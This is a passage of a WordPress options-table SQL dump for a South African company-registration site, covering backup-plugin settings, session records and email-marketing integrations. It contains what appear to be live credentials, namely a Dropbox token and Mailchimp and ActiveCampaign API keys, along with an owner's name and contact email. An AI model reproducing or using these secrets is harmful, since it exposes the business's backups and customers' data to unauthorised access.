2016.\";}}}','yes'),(159786,'_wp_session_3cbf289e052c929ef135b97958cd053c','a:1:{s:12:\"logged_in_at\";i:1480167604;}','no'),(159896,'_wp_session_expires_3cbf289e052c929ef135b97958cd053c','2991893438','no'),(160246,'_wp_session_6b06f6ba007ab84923ec40b80fc3ba4b','a:1:{s:12:\"logged_in_at\";i:1480566475;}','no'),(160291,'_cf_admin_alerts','','yes'),(160319,'_wp_session_expires_6b06f6ba007ab84923ec40b80fc3ba4b','2992681506','no'),(161128,'_wp_session_c50c5dc162b4428c329b9fb328add080','a:1:{s:12:\"logged_in_at\";i:1480590904;}','no'),(161220,'_wp_session_expires_c50c5dc162b4428c329b9fb328add080','2992731138','no'),(162017,'_wp_session_expires_35991576bd95c951bfc8b3bb531c0335','2993551300','no'),(162108,'_wp_session_35991576bd95c951bfc8b3bb531c0335','a:1:{s:12:\"logged_in_at\";i:1481004476;}','no'),(162299,'_wp_session_475107c20f5d4f4d7f86b111e6ac68a7','a:1:{s:12:\"logged_in_at\";i:1481010299;}','no'),(162300,'_wp_session_expires_475107c20f5d4f4d7f86b111e6ac68a7','2993563798','no'),(164322,'_wp_session_61a7345d3503f185b8924ef6a88ee3e7','a:1:{s:12:\"logged_in_at\";i:1481275013;}','no'),(164323,'_wp_session_expires_61a7345d3503f185b8924ef6a88ee3e7','2994093226','no'),(164868,'updraft_dropbox','a:4:{s:6:\"folder\";s:0:\"\";s:15:\"tk_access_token\";s:472:\"UGbMFR6U2N7wqYkFFpiqHK2XvMj1zjeAjNe5ZCJf3wxFFFAsB80FFgNEmdBVNrjd/Hw9gR7hxX9v8Yr+8JK5M+XVWIcWEwLdkxwzurZtuxFbiDGEdDaXnJlq6vpZXiVAnh+kjJMadQk1kKIQkJiNoy8FQN9TlA19OTEWFH6YDCYRBkbV1U2kdQIfPfaWwNPIQz1HyNp/3ltKubj4SYVJcSqScEYswwXabt0E9e38IzJ0DI7ZObfh4nFaGEfe78kZZJKS6EfjGiY/YyOdxFZsd6zruEqhB9et67r7+ZhJGb4D98259nWdMBEoZ9mYIEqzvXh/cvqWJSDziwJiuYCJng6u50NaBtxP9cli7sJZN1OfA6OQ4R6xTP+tH+HJX2HA4ucrB9ze786KuhMCuEkdak4C/H3hQodcrfeO7leVkmi7ccUC9I/NmGTQo4zN/tx/1nTuxx5F8qsckfmWhUx21Q==\";s:9:\"ownername\";s:16:\"Imraan Wajoodeen\";s:4:\"CSRF\";s:0:\"\";}','yes'),(164869,'updraftplus-addons_siteid','25b1923d1cc9847e2d54955522c54cf2','no'),(164872,'updraft_lastmessage','Adding batch to zip file (UpdraftPlus_BinZip): over 25 MB added on this batch (25.2 MB, 1535 files batched, 455 (842) added so far); re-opening (prior size: 78215.2 KB) (Mar 27 10:33:00)','yes'),(164875,'updraft_retain_extrarules','a:0:{}','yes'),(164876,'updraft_email','info@companyregistration.online','yes'),(164877,'updraft_report_warningsonly','a:0:{}','yes'),(164878,'updraft_report_wholebackup','a:0:{}','yes'),(164879,'updraft_extradbs','a:0:{}','yes'),(164880,'updraft_include_more_path','a:0:{}','yes'),(164881,'updraft_interval','weekly','yes'),(164882,'updraft_retain','4','yes'),(164883,'updraft_interval_database','daily','yes'),(164884,'updraft_retain_db','2','yes'),(164885,'updraft_service','none','yes'),(164886,'updraft_s3','a:3:{s:9:\"accesskey\";s:0:\"\";s:9:\"secretkey\";s:0:\"\";s:4:\"path\";s:0:\"\";}','yes'),(164887,'updraft_cloudfiles','a:5:{s:7:\"authurl\";s:35:\"https://auth.api.rackspacecloud.com\";s:6:\"region\";s:3:\"DFW\";s:4:\"user\";s:0:\"\";s:6:\"apikey\";s:0:\"\";s:4:\"path\";s:0:\"\";}','yes'),(164888,'updraft_googledrive','a:3:{s:8:\"clientid\";s:0:\"\";s:6:\"secret\";s:0:\"\";s:6:\"folder\";s:11:\"UpdraftPlus\";}','yes'),(164889,'updraft_ftp','a:5:{s:4:\"host\";s:0:\"\";s:4:\"user\";s:0:\"\";s:4:\"pass\";s:0:\"\";s:4:\"path\";s:0:\"\";s:7:\"passive\";s:1:\"1\";}','yes'),(164890,'updraft_s3generic','a:4:{s:8:\"endpoint\";s:0:\"\";s:9:\"accesskey\";s:0:\"\";s:9:\"secretkey\";s:0:\"\";s:4:\"path\";s:0:\"\";}','yes'),(164891,'updraft_openstack','a:6:{s:7:\"authurl\";s:0:\"\";s:6:\"tenant\";s:0:\"\";s:6:\"region\";s:0:\"\";s:4:\"user\";s:0:\"\";s:8:\"password\";s:0:\"\";s:4:\"path\";s:0:\"\";}','yes'),(164892,'updraft_dreamobjects','a:4:{s:8:\"endpoint\";s:26:\"objects-us-west-1.dream.io\";s:9:\"accesskey\";s:0:\"\";s:9:\"secretkey\";s:0:\"\";s:4:\"path\";s:0:\"\";}','yes'),(164893,'updraft_include_plugins','1','yes'),(164894,'updraft_include_themes','1','yes'),(164895,'updraft_include_uploads','1','yes'),(164896,'updraft_include_uploads_exclude','backup*,*backups,backwpup*,wp-clone,snapshots','yes'),(164897,'updraft_include_others','1','yes'),(164898,'updraft_include_others_exclude','upgrade,cache,updraft,backup*,*backups,mysql.sql,debug.log','yes'),(164899,'updraft_split_every','400','yes'),(164900,'updraft_delete_local','1','yes'),(164901,'updraft_dir','updraft','yes'),(164902,'updraft_debug_mode','0','yes'),(164903,'updraft_ssl_useservercerts','0','yes'),(164904,'updraft_ssl_disableverify','0','yes'),(164905,'updraft_ssl_nossl','0','yes'),(164973,'updraftplus_locked_fd','1','yes'),(164974,'updraftplus_last_lock_time_fd','2017-03-27 07:59:09','yes'),(164975,'updraftplus_semaphore_fd','1','yes'),(164976,'updraft_last_scheduled_fd','1490601549','yes'),(165046,'updraft_backup_history','a:14:{i:1490546568;a:15:{s:7:\"plugins\";a:1:{i:0;s:73:\"backup_2017-03-26-1842_companyregistrationonline_27729509ed2e-plugins.zip\";}s:12:\"plugins-size\";i:55537006;s:6:\"themes\";a:1:{i:0;s:72:\"backup_2017-03-26-1842_companyregistrationonline_27729509ed2e-themes.zip\";}s:11:\"themes-size\";i:12743562;s:7:\"uploads\";a:1:{i:0;s:73:\"backup_2017-03-26-1842_companyregistrationonline_27729509ed2e-uploads.zip\";}s:12:\"uploads-size\";i:117183861;s:6:\"others\";a:1:{i:0;s:72:\"backup_2017-03-26-1842_companyregistrationonline_27729509ed2e-others.zip\";}s:11:\"others-size\";i:1365620;s:2:\"db\";s:67:\"backup_2017-03-26-1842_companyregistrationonline_27729509ed2e-db.gz\";s:7:\"db-size\";i:500194;s:9:\"checksums\";a:1:{s:4:\"sha1\";a:5:{s:8:\"plugins0\";s:40:\"dfdfec3fabbd864aa4baa40a70cb87e9c674cb45\";s:7:\"themes0\";s:40:\"e91f8f6222387cf517e799d10a7bc21ab5e099ad\";s:8:\"uploads0\";s:40:\"0a51734acec334a37434887b5e1cc72b1056fbf9\";s:7:\"others0\";s:40:\"28449450fb502d1b5426134ffd9f2db27547fa4d\";s:3:\"db0\";s:40:\"66359b3ab4b2cf13ebdbe7544eeaa9c293ae223e\";}}s:5:\"nonce\";s:12:\"27729509ed2e\";s:7:\"service\";a:1:{i:0;s:7:\"dropbox\";}s:18:\"created_by_version\";s:7:\"1.12.29\";s:12:\"is_multisite\";b:0;}i:1490373774;a:15:{s:7:\"plugins\";a:1:{i:0;s:73:\"backup_2017-03-24-1842_companyregistrationonline_3067be80b53c-plugins.zip\";}s:12:\"plugins-size\";i:55537006;s:6:\"themes\";a:1:{i:0;s:72:\"backup_2017-03-24-1842_companyregistrationonline_3067be80b53c-themes.zip\";}s:11:\"themes-size\";i:12743562;s:7:\"uploads\";a:1:{i:0;s:73:\"backup_2017-03-24-1842_companyregistrationonline_3067be80b53c-uploads.zip\";}s:12:\"uploads-size\";i:117183861;s:6:\"others\";a:1:{i:0;s:72:\"backup_2017-03-24-1842_companyregistrationonline_3067be80b53c-others.zip\";}s:11:\"others-size\";i:1365620;s:2:\"db\";s:67:\"backup_2017-03-24-1842_companyregistrationonline_3067be80b53c-db.gz\";s:7:\"db-size\";i:498751;s:9:\"checksums\";a:1:{s:4:\"sha1\";a:5:{s:8:\"plugins0\";s:40:\"1e2f85e113c7b12ae9e3a9f8ff503abc1312e8e1\";s:7:\"themes0\";s:40:\"941d34a5bbef8035f5ca2c43c7009c6b47db20c9\";s:8:\"uploads0\";s:40:\"4343503bd84d587dd81153faec0f5b003041360a\";s:7:\"others0\";s:40:\"cc3401474cdd0e35106adf06e3f440499a76f0de\";s:3:\"db0\";s:40:\"635b1c3e0148925f92fe424d96f9a6f349a35071\";}}s:5:\"nonce\";s:12:\"3067be80b53c\";s:7:\"service\";a:1:{i:0;s:7:\"dropbox\";}s:18:\"created_by_version\";s:7:\"1.12.29\";s:12:\"is_multisite\";b:0;}i:1537521627;a:4:{s:6:\"themes\";s:72:\"backup_2018-09-21-0920_companyregistrationonline_dfc45c68ac3e-themes.zip\";s:7:\"plugins\";s:73:\"backup_2018-09-21-0920_companyregistrationonline_dfc45c68ac3e-plugins.zip\";s:7:\"uploads\";s:73:\"backup_2018-09-21-0920_companyregistrationonline_dfc45c68ac3e-uploads.zip\";s:2:\"db\";s:67:\"backup_2018-09-21-0920_companyregistrationonline_dfc45c68ac3e-db.gz\";}i:1537521969;a:4:{s:6:\"themes\";s:72:\"backup_2018-09-21-0926_companyregistrationonline_928a67aa3fce-themes.zip\";s:7:\"plugins\";s:73:\"backup_2018-09-21-0926_companyregistrationonline_928a67aa3fce-plugins.zip\";s:7:\"uploads\";s:73:\"backup_2018-09-21-0926_companyregistrationonline_928a67aa3fce-uploads.zip\";s:2:\"db\";s:67:\"backup_2018-09-21-0926_companyregistrationonline_928a67aa3fce-db.gz\";}i:1537522358;a:4:{s:6:\"themes\";s:72:\"backup_2018-09-21-0932_companyregistrationonline_982054940ff0-themes.zip\";s:7:\"plugins\";s:73:\"backup_2018-09-21-0932_companyregistrationonline_982054940ff0-plugins.zip\";s:7:\"uploads\";s:73:\"backup_2018-09-21-0932_companyregistrationonline_982054940ff0-uploads.zip\";s:2:\"db\";s:67:\"backup_2018-09-21-0932_companyregistrationonline_982054940ff0-db.gz\";}i:1538128506;a:4:{s:6:\"themes\";s:72:\"backup_2018-09-28-0955_companyregistrationonline_7e16d34adf35-themes.zip\";s:7:\"plugins\";s:73:\"backup_2018-09-28-0955_companyregistrationonline_7e16d34adf35-plugins.zip\";s:7:\"uploads\";s:73:\"backup_2018-09-28-0955_companyregistrationonline_7e16d34adf35-uploads.zip\";s:2:\"db\";s:67:\"backup_2018-09-28-0955_companyregistrationonline_7e16d34adf35-db.gz\";}i:1538732486;a:4:{s:6:\"themes\";s:72:\"backup_2018-10-05-0941_companyregistrationonline_2d7324d02154-themes.zip\";s:7:\"plugins\";s:73:\"backup_2018-10-05-0941_companyregistrationonline_2d7324d02154-plugins.zip\";s:7:\"uploads\";s:73:\"backup_2018-10-05-0941_companyregistrationonline_2d7324d02154-uploads.zip\";s:2:\"db\";s:67:\"backup_2018-10-05-0941_companyregistrationonline_2d7324d02154-db.gz\";}i:1539337642;a:4:{s:6:\"themes\";s:72:\"backup_2018-10-12-0947_companyregistrationonline_8e21b468015e-themes.zip\";s:7:\"plugins\";s:73:\"backup_2018-10-12-0947_companyregistrationonline_8e21b468015e-plugins.zip\";s:7:\"uploads\";s:73:\"backup_2018-10-12-0947_companyregistrationonline_8e21b468015e-uploads.zip\";s:2:\"db\";s:67:\"backup_2018-10-12-0947_companyregistrationonline_8e21b468015e-db.gz\";}i:1539945034;a:4:{s:6:\"themes\";s:72:\"backup_2018-10-19-1030_companyregistrationonline_737482236251-themes.zip\";s:7:\"plugins\";s:73:\"backup_2018-10-19-1030_companyregistrationonline_737482236251-plugins.zip\";s:7:\"uploads\";s:73:\"backup_2018-10-19-1030_companyregistrationonline_737482236251-uploads.zip\";s:2:\"db\";s:67:\"backup_2018-10-19-1030_companyregistrationonline_737482236251-db.gz\";}i:1540546660;a:4:{s:6:\"themes\";s:72:\"backup_2018-10-26-0937_companyregistrationonline_88dc40b50d3c-themes.zip\";s:7:\"plugins\";s:73:\"backup_2018-10-26-0937_companyregistrationonline_88dc40b50d3c-plugins.zip\";s:7:\"uploads\";s:73:\"backup_2018-10-26-0937_companyregistrationonline_88dc40b50d3c-uploads.zip\";s:2:\"db\";s:67:\"backup_2018-10-26-0937_companyregistrationonline_88dc40b50d3c-db.gz\";}i:1541151377;a:4:{s:6:\"themes\";s:72:\"backup_2018-11-02-0936_companyregistrationonline_5bf7d4c0365d-themes.zip\";s:7:\"plugins\";s:73:\"backup_2018-11-02-0936_companyregistrationonline_5bf7d4c0365d-plugins.zip\";s:7:\"uploads\";s:73:\"backup_2018-11-02-0936_companyregistrationonline_5bf7d4c0365d-uploads.zip\";s:2:\"db\";s:67:\"backup_2018-11-02-0936_companyregistrationonline_5bf7d4c0365d-db.gz\";}i:1541678745;a:4:{s:6:\"themes\";s:72:\"backup_2018-11-08-1205_companyregistrationonline_c09d709da1f7-themes.zip\";s:7:\"plugins\";s:73:\"backup_2018-11-08-1205_companyregistrationonline_c09d709da1f7-plugins.zip\";s:7:\"uploads\";s:73:\"backup_2018-11-08-1205_companyregistrationonline_c09d709da1f7-uploads.zip\";s:2:\"db\";s:67:\"backup_2018-11-08-1205_companyregistrationonline_c09d709da1f7-db.gz\";}i:1541756003;a:4:{s:6:\"themes\";s:72:\"backup_2018-11-09-0933_companyregistrationonline_f5b88c16e490-themes.zip\";s:7:\"plugins\";s:73:\"backup_2018-11-09-0933_companyregistrationonline_f5b88c16e490-plugins.zip\";s:7:\"uploads\";s:73:\"backup_2018-11-09-0933_companyregistrationonline_f5b88c16e490-uploads.zip\";s:2:\"db\";s:67:\"backup_2018-11-09-0933_companyregistrationonline_f5b88c16e490-db.gz\";}i:1542009006;a:4:{s:6:\"themes\";s:72:\"backup_2018-11-12-0750_companyregistrationonline_8393076a30ed-themes.zip\";s:7:\"plugins\";s:73:\"backup_2018-11-12-0750_companyregistrationonline_8393076a30ed-plugins.zip\";s:7:\"uploads\";s:73:\"backup_2018-11-12-0750_companyregistrationonline_8393076a30ed-uploads.zip\";s:2:\"db\";s:67:\"backup_2018-11-12-0750_companyregistrationonline_8393076a30ed-db.gz\";}}','yes'),(165047,'updraft_last_backup','a:5:{s:11:\"backup_time\";i:1490546568;s:12:\"backup_array\";a:11:{s:7:\"plugins\";a:1:{i:0;s:73:\"backup_2017-03-26-1842_companyregistrationonline_27729509ed2e-plugins.zip\";}s:12:\"plugins-size\";i:55537006;s:6:\"themes\";a:1:{i:0;s:72:\"backup_2017-03-26-1842_companyregistrationonline_27729509ed2e-themes.zip\";}s:11:\"themes-size\";i:12743562;s:7:\"uploads\";a:1:{i:0;s:73:\"backup_2017-03-26-1842_companyregistrationonline_27729509ed2e-uploads.zip\";}s:12:\"uploads-size\";i:117183861;s:6:\"others\";a:1:{i:0;s:72:\"backup_2017-03-26-1842_companyregistrationonline_27729509ed2e-others.zip\";}s:11:\"others-size\";i:1365620;s:2:\"db\";s:67:\"backup_2017-03-26-1842_companyregistrationonline_27729509ed2e-db.gz\";s:7:\"db-size\";i:500194;s:9:\"checksums\";a:1:{s:4:\"sha1\";a:5:{s:8:\"plugins0\";s:40:\"dfdfec3fabbd864aa4baa40a70cb87e9c674cb45\";s:7:\"themes0\";s:40:\"e91f8f6222387cf517e799d10a7bc21ab5e099ad\";s:8:\"uploads0\";s:40:\"0a51734acec334a37434887b5e1cc72b1056fbf9\";s:7:\"others0\";s:40:\"28449450fb502d1b5426134ffd9f2db27547fa4d\";s:3:\"db0\";s:40:\"66359b3ab4b2cf13ebdbe7544eeaa9c293ae223e\";}}}s:7:\"success\";i:1;s:6:\"errors\";a:0:{}s:12:\"backup_nonce\";s:12:\"27729509ed2e\";}','yes'),(165136,'updraftplus_unlocked_','1','yes'),(165137,'updraftplus_last_lock_time_','2016-12-09 16:42:06','yes'),(165138,'updraftplus_semaphore_','0','yes'),(166266,'_wp_session_b64715d251c6968a6d727db66f0e39dc','a:1:{s:12:\"logged_in_at\";i:1481379519;}','no'),(166280,'fresh_site','0','yes'),(166808,'_wp_session_expires_b64715d251c6968a6d727db66f0e39dc','2994433182','no'),(168927,'_wp_session_expires_d8fb706e94a6266a33d3188bc151ea68','2994821450','no'),(168950,'jetpack_sync_full__started','1481639232','no'),(168951,'jetpack_sync_full__params','a:4:{s:7:\"options\";b:1;s:15:\"network_options\";b:1;s:9:\"functions\";b:1;s:9:\"constants\";b:1;}','no'),(168958,'jetpack_sync_full__queue_finished','1481639232','yes'),(168972,'jetpack_sync_full__send_started','1481639238','no'),(168973,'jetpack_sync_full__constants_sent','1','no'),(168974,'jetpack_sync_full__functions_sent','1','no'),(168975,'jetpack_sync_full__options_sent','1','no'),(168976,'jetpack_sync_full__finished','1481639238','no'),(169117,'_wp_session_d8fb706e94a6266a33d3188bc151ea68','a:1:{s:12:\"logged_in_at\";i:1481640074;}','no'),(234712,'_wp_session_expires_41ba528a84f507b887938c6e9d576e11','3007063442','no'),(234719,'_wp_session_41ba528a84f507b887938c6e9d576e11','a:2:{s:31:\"clef_account_connected_on_login\";N;s:12:\"logged_in_at\";i:1487760121;}','no'),(265080,'updraft_combine_jobs_around','1490632915','yes'),(265627,'jetpack_nonce_1490601495_4m1V9x28sg','1490601495','no'),(265644,'jetpack_nonce_1490601500_al5UcE4X2r','1490601500','no'),(265658,'updraft_jobdata_adf2d2035439','a:24:{s:15:\"resume_interval\";i:300;s:8:\"job_type\";s:6:\"backup\";s:9:\"jobstatus\";s:13:\"filescreating\";s:11:\"backup_time\";i:1490601548;s:11:\"job_time_ms\";d:1490601548.982583;s:7:\"service\";a:1:{i:0;s:7:\"dropbox\";}s:11:\"split_every\";i:400;s:11:\"maxzipbatch\";i:26214400;s:17:\"job_file_entities\";a:4:{s:7:\"plugins\";a:1:{s:5:\"index\";i:0;}s:6:\"themes\";a:1:{s:5:\"index\";i:0;}s:7:\"uploads\";a:1:{s:5:\"index\";i:0;}s:6:\"others\";a:1:{s:5:\"index\";i:0;}}s:12:\"option_cache\";a:1:{s:15:\"updraft_dropbox\";a:4:{s:6:\"folder\";s:0:\"\";s:15:\"tk_access_token\";s:472:\"UGbMFR6U2N7wqYkFFpiqHK2XvMj1zjeAjNe5ZCJf3wxFFFAsB80FFgNEmdBVNrjd/Hw9gR7hxX9v8Yr+8JK5M+XVWIcWEwLdkxwzurZtuxFbiDGEdDaXnJlq6vpZXiVAnh+kjJMadQk1kKIQkJiNoy8FQN9TlA19OTEWFH6YDCYRBkbV1U2kdQIfPfaWwNPIQz1HyNp/3ltKubj4SYVJcSqScEYswwXabt0E9e38IzJ0DI7ZObfh4nFaGEfe78kZZJKS6EfjGiY/YyOdxFZsd6zruEqhB9et67r7+ZhJGb4D98259nWdMBEoZ9mYIEqzvXh/cvqWJSDziwJiuYCJng6u50NaBtxP9cli7sJZN1OfA6OQ4R6xTP+tH+HJX2HA4ucrB9ze786KuhMCuEkdak4C/H3hQodcrfeO7leVkmi7ccUC9I/NmGTQo4zN/tx/1nTuxx5F8qsckfmWhUx21Q==\";s:9:\"ownername\";s:16:\"Imraan Wajoodeen\";s:4:\"CSRF\";s:0:\"\";}}s:18:\"uploaded_lastreset\";i:9;s:8:\"one_shot\";b:0;s:18:\"followsups_allowed\";b:0;s:15:\"backup_database\";a:1:{s:2:\"wp\";s:5:\"begun\";}s:12:\"backup_files\";s:5:\"begun\";s:12:\"runs_started\";a:7:{i:0;d:1490601549.0315969;i:1;d:1490601930.5037611;i:2;d:1490602269.387852;i:3;d:1490602573.4865029;i:4;d:1490602880.5018251;i:5;d:1490603187.718159;i:6;d:1490603490.9204321;}s:18:\"current_resumption\";i:6;s:6:\"binzip\";s:12:\"/usr/bin/zip\";s:22:\"filecreating_substatus\";a:3:{s:1:\"e\";s:7:\"uploads\";s:1:\"i\";i:3;s:1:\"t\";i:4;}s:19:\"files_enumerated_at\";a:3:{s:7:\"plugins\";i:1490602880;s:6:\"themes\";i:1490602937;s:7:\"uploads\";i:1490603491;}s:9:\"run_times\";a:7:{i:0;d:125.38994789123535;i:1;d:111.84811210632324;i:2;d:114.9900689125061;i:3;d:112.60600185394287;i:4;d:119.708251953125;i:5;d:33.081004858016968;i:6;d:89.814862012863159;}s:14:\"useful_checkin\";i:6;s:13:\"sha1-plugins0\";s:40:\"c83ab4f528400bcdf318a7dc61f16b0217d624cb\";s:12:\"sha1-themes0\";s:40:\"c860ad4580bf2a94210457f7a62bb43cc28a845f\";}','no'),(265759,'_wp_session_expires_c5ccc648c431815824c167d968f2be7d','3012752162','no'),(265796,'jetpack_protect_error','Invalid Action Specified','no'),(265798,'_wp_session_c5ccc648c431815824c167d968f2be7d','a:1:{s:12:\"logged_in_at\";i:1490605144;}','no'),(265807,'jetpack_nonce_1490605150_44lVDcLWwZ','1490605151','no'),(266201,'n2_ss3_version','3.2.4','yes'),(266214,'yikes_woo_reusable_products_tabs','','yes'),(266215,'yikes_woo_reusable_products_tabs_applied','','yes'),(273868,'et_core_api_email_options','a:2:{i:0;b:0;s:8:\"accounts\";a:2:{s:9:\"mailchimp\";a:1:{s:50:\"www.companyregistration.online division of MAW Inc\";a:3:{s:5:\"lists\";a:7:{s:10:\"08de047b4d\";a:4:{s:7:\"list_id\";s:10:\"08de047b4d\";s:4:\"name\";s:33:\"Company Registration Sales Funnel\";s:12:\"double_optin\";b:0;s:17:\"subscribers_count\";i:0;}s:10:\"2d6d33becc\";a:4:{s:7:\"list_id\";s:10:\"2d6d33becc\";s:4:\"name\";s:35:\"Leadin 50% Off first time purchaser\";s:12:\"double_optin\";b:0;s:17:\"subscribers_count\";i:0;}s:10:\"542068cd37\";a:4:{s:7:\"list_id\";s:10:\"542068cd37\";s:4:\"name\";s:6:\"Leadin\";s:12:\"double_optin\";b:0;s:17:\"subscribers_count\";i:0;}s:10:\"abaf610c73\";a:4:{s:7:\"list_id\";s:10:\"abaf610c73\";s:4:\"name\";s:9:\"Test List\";s:12:\"double_optin\";b:0;s:17:\"subscribers_count\";i:0;}s:10:\"c43fc9f251\";a:4:{s:7:\"list_id\";s:10:\"c43fc9f251\";s:4:\"name\";s:7:\"MAW Inc\";s:12:\"double_optin\";b:0;s:17:\"subscribers_count\";i:0;}s:10:\"ec951c84d8\";a:4:{s:7:\"list_id\";s:10:\"ec951c84d8\";s:4:\"name\";s:37:\"Facebook & companyregistration.online\";s:12:\"double_optin\";b:0;s:17:\"subscribers_count\";i:0;}s:10:\"fb084be2ed\";a:4:{s:7:\"list_id\";s:10:\"fb084be2ed\";s:4:\"name\";s:39:\"companyregistration.online Free eReport\";s:12:\"double_optin\";b:0;s:17:\"subscribers_count\";i:0;}}s:7:\"api_key\";s:37:\"f8bb53acbe9ac33569d157c07c5528d6-us10\";s:13:\"is_authorized\";b:1;}}s:14:\"activecampaign\";a:2:{s:23:\"maw831.activehosted.com\";a:5:{s:5:\"lists\";a:8:{i:4;a:3:{s:7:\"list_id\";s:1:\"4\";s:4:\"name\";s:4:\"Main\";s:17:\"subscribers_count\";i:194;}i:11;a:3:{s:7:\"list_id\";s:2:\"11\";s:4:\"name\";s:19:\"Companyregistration\";s:17:\"subscribers_count\";i:104;}i:12;a:3:{s:7:\"list_id\";s:2:\"12\";s:4:\"name\";s:18:\"Digital Strategies\";s:17:\"subscribers_count\";i:0;}i:13;a:3:{s:7:\"list_id\";s:2:\"13\";s:4:\"name\";s:8:\"MAW Inc.\";s:17:\"subscribers_count\";i:81;}i:16;a:3:{s:7:\"list_id\";s:2:\"16\";s:4:\"name\";s:20:\"Coreg Site Purchases\";s:17:\"subscribers_count\";i:0;}i:17;a:3:{s:7:\"list_id\";s:2:\"17\";s:4:\"name\";s:30:\"Vertical Vixen Lead Generation\";s:17:\"subscribers_count\";i:9;}i:18;a:3:{s:7:\"list_id\";s:2:\"18\";s:4:\"name\";s:23:\"Shelf Vat Registrations\";s:17:\"subscribers_count\";i:0;}i:19;a:3:{s:7:\"list_id\";s:2:\"19\";s:4:\"name\";s:22:\"Website Annual Returns\";s:17:\"subscribers_count\";i:0;}}s:7:\"api_key\";s:72:\"fa7ad7dcbed82fe83b8fce10f709a8fc689038443742c59d62477758f318f46adc70dc88\";s:7:\"api_url\";s:26:\"https://maw831.api-us1.com\";s:13:\"is_authorized\";s:4:\"true\";s:13:\"custom_fields\";a:48:{i:2;a:4:{s:8:\"field_id\";s:1:\"2\";s:4:\"name\";s:5:\"Title\";s:4:\"type\";s:5:\"input\";s:6:\"hidden\";b:0;}i:3;a:4:{s:8:\"field_id\";s:1:\"3\";s:4:\"name\";s:17:\"Issue Description\";s:4:\"type\";s:8:\"textarea\";s:6:\"hidden\";b:0;}i:4;a:5:{s:8:\"field_id\";s:1:\"4\";s:4:\"name\";s:30:\"Please tick one or more issues\";s:4:\"type\";s:8:\"checkbox\";s:6:\"hidden\";b:0;s:7:\"options\";a:6:{s:25:\"Messages not responded to\";s:25:\"Messages not responded to\";s:16:\"Cloud accounting\";s:16:\"Cloud accounting\";s:12:\"Tax question\";s:12:\"Tax question\";s:20:\"Acccounting question\";s:20:\"Acccounting question\";s:28:\"Company secretarial question\";s:28:\"Company secretarial question\";s:5:\"Other\";s:5:\"Other\";}}i:5;a:4:{s:8:\"field_id\";s:1:\"5\";s:4:\"name\";s:13:\"Date of Birth\";s:4:\"type\";s:4:\"text\";s:6:\"hidden\";b:0;}i:6;a:4:{s:8:\"field_id\";s:1:\"6\";s:4:\"name\";s:16:\"Medical Aid Name\";s:4:\"type\";s:5:\"input\";s:6:\"hidden\";b:0;}i:7;a:4:{s:8:\"field_id\";s:1:\"7\";s:4:\"name\";s:18:\"Medical Aid Number\";s:4:\"type\";s:5:\"input\";s:6:\"hidden\";b:0;}i:10;a:4:{s:8:\"field_id\";s:2:\"10\";s:4:\"name\";s:27:\"Company 2 Registration Date\";s:4:\"type\";s:4:\"text\";s:6:\"hidden\";b:0;}i:15;a:5:{s:8:\"field_id\";s:2:\"15\";s:4:\"name\";s:32:\"Organisation E-filing Registered\";s:4:\"type\";s:5:\"radio\";s:6:\"hidden\";b:0;s:7:\"options\";a:2:{s:3:\"Yes\";s:3:\"Yes\";s:2:\"No\";s:2:\"No\";}}i:17;a:5:{s:8:\"field_id\";s:2:\"17\";s:4:\"name\";s:37:\"Client Practice Management Registered\";s:4:\"type\";s:5:\"radio\";s:6:\"hidden\";b:0;s:7:\"options\";a:2:{s:3:\"Yes\";s:3:\"Yes\";s:2:\"No\";s:2:\"No\";}}i:18;a:5:{s:8:\"field_id\";s:2:\"18\";s:4:\"name\";s:36:\"Select the service you interested in\";s:4:\"type\";s:6:\"select\";s:6:\"hidden\";b:0;s:7:\"options\";a:4:{s:8:\"Start-up\";s:8:\"Start-up\";s:22:\"Compliance & Reporting\";s:22:\"Compliance & Reporting\";s:21:\"Outsourced Accountant\";s:21:\"Outsourced Accountant\";s:28:\"Outsourced Financial Manager\";s:28:\"Outsourced Financial Manager\";}}i:19;a:4:{s:8:\"field_id\";s:2:\"19\";s:4:\"name\";s:8:\"CIPC Fee\";s:4:\"type\";s:5:\"input\";s:6:\"hidden\";b:0;}i:20;a:4:{s:8:\"field_id\";s:2:\"20\";s:4:\"name\";s:12:\"CIPC Penalty\";s:4:\"type\";s:5:\"input\";s:6:\"hidden\";b:0;}i:21;a:4:{s:8:\"field_id\";s:2:\"21\";s:4:\"name\";s:25:\"Total CIPC Amount Payable\";s:4:\"type\";s:5:\"input\";s:6:\"hidden\";b:0;}i:22;a:4:{s:8:\"field_id\";s:2:\"22\";s:4:\"name\";s:13:\"EMP201 Period\";s:4:\"type\";s:5:\"input\";s:6:\"hidden\";b:0;}i:23;a:4:{s:8:\"field_id\";s:2:\"23\";s:4:\"name\";s:13:\"EMP201 Amount\";s:4:\"type\";s:5:\"input\";s:6:\"hidden\";b:0;}i:24;a:4:{s:8:\"field_id\";s:2:\"24\";s:4:\"name\";s:28:\"EMP201 E-filing Payment Date\";s:4:\"type\";s:4:\"text\";s:6:\"hidden\";b:0;}i:25;a:4:{s:8:\"field_id\";s:2:\"25\";s:4:\"name\";s:14:\"EMP201 Company\";s:4:\"type\";s:5:\"input\";s:6:\"hidden\";b:0;}i:26;a:5:{s:8:\"field_id\";s:2:\"26\";s:4:\"name\";s:43:\"Which of our services are you interested in\";s:4:\"type\";s:8:\"checkbox\";s:6:\"hidden\";b:0;s:7:\"options\";a:4:{s:33:\"Compliance and Reporting - R3 600\";s:33:\"Compliance and Reporting - R3 600\";s:30:\"Outsourced Accountant - R5 500\";s:30:\"Outsourced Accountant - R5 500\";s:38:\"Outsourced Financial Manager - R15 500\";s:38:\"Outsourced Financial Manager - R15 500\";s:19:\"Customised Solution\";s:19:\"Customised Solution\";}}i:27;a:4:{s:8:\"field_id\";s:2:\"27\";s:4:\"name\";s:6:\"Gender\";s:4:\"type\";s:5:\"input\";s:6:\"hidden\";b:0;}i:28;a:4:{s:8:\"field_id\";s:2:\"28\";s:4:\"name\";s:8:\"Religion\";s:4:\"type\";s:5:\"input\";s:6:\"hidden\";b:0;}i:29;a:4:{s:8:\"field_id\";s:2:\"29\";s:4:\"name\";s:40:\"VAT Registration Efiling Submission Date\";s:4:\"type\";s:4:\"text\";s:6:\"hidden\";b:0;}i:30;a:4:{s:8:\"field_id\";s:2:\"30\";s:4:\"name\";s:21:\"VAT Registration Date\";s:4:\"type\";s:4:\"text\";s:6:\"hidden\";b:0;}i:31;a:4:{s:8:\"field_id\";s:2:\"31\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:5:\"input\";s:6:\"hidden\";b:0;}i:32;a:4:{s:8:\"field_id\";s:2:\"32\";s:4:\"name\";s:16:\"Appointment 